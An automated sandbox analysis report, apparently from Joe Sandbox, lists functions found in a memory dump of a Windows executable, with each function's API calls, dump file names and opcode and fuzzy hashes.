                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CurrentH_prologThread
                                    • String ID: WdL
                                    • API String ID: 2095891121-3897115199
                                    • Opcode ID: 8e7e32220b13be093acf2f9fed99cfb1e46b79e39eff79d5f8de67757a1be42d
                                    • Instruction ID: 49426ac542c4221a05dc5736a777e9bf4a50a7504f1963df87fc0d2a1c5dda3d
                                    • Opcode Fuzzy Hash: 8e7e32220b13be093acf2f9fed99cfb1e46b79e39eff79d5f8de67757a1be42d
                                    • Instruction Fuzzy Hash: E321B3B4900B009ED7609F2AC441B9BFBE8FFA5300F14892FE5AA87621DBB464418F55
                                    Function 004BFF72 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindResourceA.KERNEL32(?,#oC,000000F0), ref: 004BFF91
                                    • LoadResource.KERNEL32(?,00000000,?,?,?,004BD832,?,?,00436F23), ref: 004BFF9D
                                    • LockResource.KERNEL32(00000000,?,?,?,004BD832,?,?,00436F23), ref: 004BFFAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock
                                    • String ID: #oC
                                    • API String ID: 2752051264-3371845353
                                    • Opcode ID: 175f7f293f2380efb18d96dcad449a18374befda3594840448db0d7711eccd02
                                    • Instruction ID: 5c8d83825f2e3f1cffc33cc714e43ca2690c013302b288becec12528aec015d9
                                    • Opcode Fuzzy Hash: 175f7f293f2380efb18d96dcad449a18374befda3594840448db0d7711eccd02
                                    • Instruction Fuzzy Hash: 6AE0ED336001116B87512B665C48CBFF6AEEFC2361B25083BF505C2112DB288C0A8239
                                    Function 004C3971 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 004C3982
                                    • GetClassNameA.USER32(00000000,?,0000000A), ref: 004C399D
                                    • lstrcmpiA.KERNEL32(?,combobox), ref: 004C39AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassLongNameWindowlstrcmpi
                                    • String ID: combobox
                                    • API String ID: 2054663530-2240613097
                                    • Opcode ID: 25e60858ad3ff6137c50043dbef25ed2088f91e111dabcdca2c773af42314691
                                    • Instruction ID: 92243521f27f2f8a63e8bc5b3554df48d5bf3684fa241a60b75a6f30e810fb03
                                    • Opcode Fuzzy Hash: 25e60858ad3ff6137c50043dbef25ed2088f91e111dabcdca2c773af42314691
                                    • Instruction Fuzzy Hash: 6DE06575954209BBCF519F70CC4DFAE3B78BB1130AF108235B41BD51A0D674E645C659
                                    Function 0242C1EF Relevance: 6.5, APIs: 5, Instructions: 222stringmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(024241FE), ref: 0242C2A2
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 0242431E
                                      • Part of subcall function 024242C7: tolower.MSVCRT ref: 02424330
                                    • GlobalAlloc.KERNEL32(00000040,00010000), ref: 0242C2E7
                                    • lstrlen.KERNEL32(024A3F70,?), ref: 0242C32F
                                    • lstrlen.KERNEL32(?), ref: 0242C44F
                                      • Part of subcall function 02424521: CreateFileA.KERNEL32(024A4034,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0242454A
                                    • GlobalFree.KERNEL32(00000000), ref: 0242C591
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Globaltolower$AllocCreateFileFree
                                    • String ID:
                                    • API String ID: 2905081297-0
                                    • Opcode ID: 091eddc7a93f723c1a3b13bba9122db08df93b9bd43292fec8f5b6239c600ec7
                                    • Instruction ID: f5fb207c7685fa556c33cdc3a2c5a47809fb49f780455bb08763ec92c4447843
                                    • Opcode Fuzzy Hash: 091eddc7a93f723c1a3b13bba9122db08df93b9bd43292fec8f5b6239c600ec7
                                    • Instruction Fuzzy Hash: 8F9160B1D002289BCB25CF96DDC4BAEB7B9AB48344F4045DEE50DA7280D775AB89CF50
                                    Function 00421221 Relevance: 6.4, APIs: 4, Instructions: 387windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,00000140,00000000,00000000), ref: 0042132C
                                    • SendMessageA.USER32(?,00000140,00000000,00000000), ref: 0042139E
                                    • SendMessageA.USER32(?,00000140,00000000,00000000), ref: 0042142F
                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004215E9
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 42bc2efb214247feded8345b0ef7d2e2a3d9f18077e355108be0ae65c2b6f26c
                                    • Instruction ID: 12e165aa0ac9fa7eb15abe8dca2e0c0d979e901baef12aca439eaf28c1ee53a8
                                    • Opcode Fuzzy Hash: 42bc2efb214247feded8345b0ef7d2e2a3d9f18077e355108be0ae65c2b6f26c
                                    • Instruction Fuzzy Hash: 0BE19F36644740CFD324DF29D881B9AF3E0FBD4B14F508A2EE95A87780DB79A806CB55
                                    Function 0043D720 Relevance: 6.2, APIs: 4, Instructions: 246COMMON
                                    Download Yara Rule
                                    APIs
                                    • midiStreamOpen.WINMM(005DF0F8,005DF120,00000001,0043DD40,005DF0DC,00030000,00000000,005DF0DC,?,00000000), ref: 0043D74B
                                    • midiStreamProperty.WINMM ref: 0043D832
                                    • midiOutPrepareHeader.WINMM(00000000,00000000,00000040,00000001,00000000,00000000,005DF0DC,?,00000000), ref: 0043D980
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: midi$Stream$HeaderOpenPrepareProperty
                                    • String ID:
                                    • API String ID: 2061886437-0
                                    • Opcode ID: 0eab71a0c04eee356c35be4d994fa099b862ef0320cebc22ee72d446a9432412
                                    • Instruction ID: bc2f2eeaf38f8ecc6af8e8ecbfcad736b37259d6281b0283c1fb544c54e62d07
                                    • Opcode Fuzzy Hash: 0eab71a0c04eee356c35be4d994fa099b862ef0320cebc22ee72d446a9432412
                                    • Instruction Fuzzy Hash: 88A17CB16006058FD724DF29D890BAAB7F6FB88304F10492EE69AC7750EB35F919CB44
                                    Function 0043B830 Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0043B842
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0043B89A
                                    • __ftol.LIBCMT ref: 0043B985
                                    • __ftol.LIBCMT ref: 0043B992
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ObjectSelect__ftol$ClientRect
                                    • String ID:
                                    • API String ID: 2514210182-0
                                    • Opcode ID: adfb4278508219dc0635fe45012f1b615c957978564ab572a8ca7a57fb398609
                                    • Instruction ID: fa6ce507f3acf39501fd14e264ec979dc582a4a44c500ea9b15a0f3bfe5d4f4a
                                    • Opcode Fuzzy Hash: adfb4278508219dc0635fe45012f1b615c957978564ab572a8ca7a57fb398609
                                    • Instruction Fuzzy Hash: 3651AEB1A083029FC714DF29C980A6BBBE9FFC8700F144A2EFA8593251D734DD458B96
                                    Function 00428E00 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(?), ref: 00428E74
                                    • GetParent.USER32(?), ref: 00428EC4
                                    • IsWindow.USER32(?), ref: 00428EE4
                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000013), ref: 00428F5F
                                      • Part of subcall function 004C088A: ShowWindow.USER32(?,?,004164AE,?), ref: 004C0898
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$ParentShow
                                    • String ID:
                                    • API String ID: 2052805569-0
                                    • Opcode ID: c54be7c32785ae336d0c7dade66ae470ac4b6afde1bec856540e56fb02ebd9e3
                                    • Instruction ID: 867a575e8e47ab6a5953092b555829ba90373fc98400e5e31bd8bde6f756f48c
                                    • Opcode Fuzzy Hash: c54be7c32785ae336d0c7dade66ae470ac4b6afde1bec856540e56fb02ebd9e3
                                    • Instruction Fuzzy Hash: 6E41C071700321ABD320DE61AD81FAFB3A5AF94754F45052EFD049B381DB78EC058BA9
                                    Function 00415470 Relevance: 6.1, APIs: 4, Instructions: 144windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C08B1: IsWindowEnabled.USER32(?), ref: 004C08BB
                                    • IsWindowVisible.USER32(?), ref: 004154AA
                                      • Part of subcall function 004BE881: GetWindowTextLengthA.USER32(00000000), ref: 004BE88E
                                      • Part of subcall function 004BE881: GetWindowTextA.USER32(00000000,00000000,00000000), ref: 004BE8A6
                                      • Part of subcall function 004BADE4: SendMessageA.USER32(?,00000466,00000000,00000000), ref: 004BADF0
                                    • wsprintfA.USER32 ref: 00415544
                                    • SendMessageA.USER32(?,000000B1,00000000,000000FF), ref: 00415570
                                    • SendMessageA.USER32(?,000000B7,00000000,00000000), ref: 0041557F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$Text$EnabledLengthVisiblewsprintf
                                    • String ID:
                                    • API String ID: 1914814478-0
                                    • Opcode ID: ed467b0b66946e223aa2d83e77d057760392189b1f699b937d45d7301b9172a3
                                    • Instruction ID: 3d4ecce6f621954bd8e34688a95f336f01eb48dab4e75cfe0bc6d42d1a0fba7e
                                    • Opcode Fuzzy Hash: ed467b0b66946e223aa2d83e77d057760392189b1f699b937d45d7301b9172a3
                                    • Instruction Fuzzy Hash: 72515575608700AFD364DF14CA91B9BB7E6BBC8704F50891EE59A87780CB78E801CB96
                                    Function 0041AFD0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c34212991f3f07fd964cca6ef81fb3bfe288dabc868c2992361fa84f07c8d0cb
                                    • Instruction ID: 44fda1a0bf6e262af31edde728aab9fbe610db2a1ee7d87060d1a5f09082f0a0
                                    • Opcode Fuzzy Hash: c34212991f3f07fd964cca6ef81fb3bfe288dabc868c2992361fa84f07c8d0cb
                                    • Instruction Fuzzy Hash: 6231A0727142019FD320DF69E881FAB73E5EB84704F008C2EF542CB281E779E8428BA5
                                    Function 00439410 Relevance: 6.1, APIs: 4, Instructions: 100COMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 0043947F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
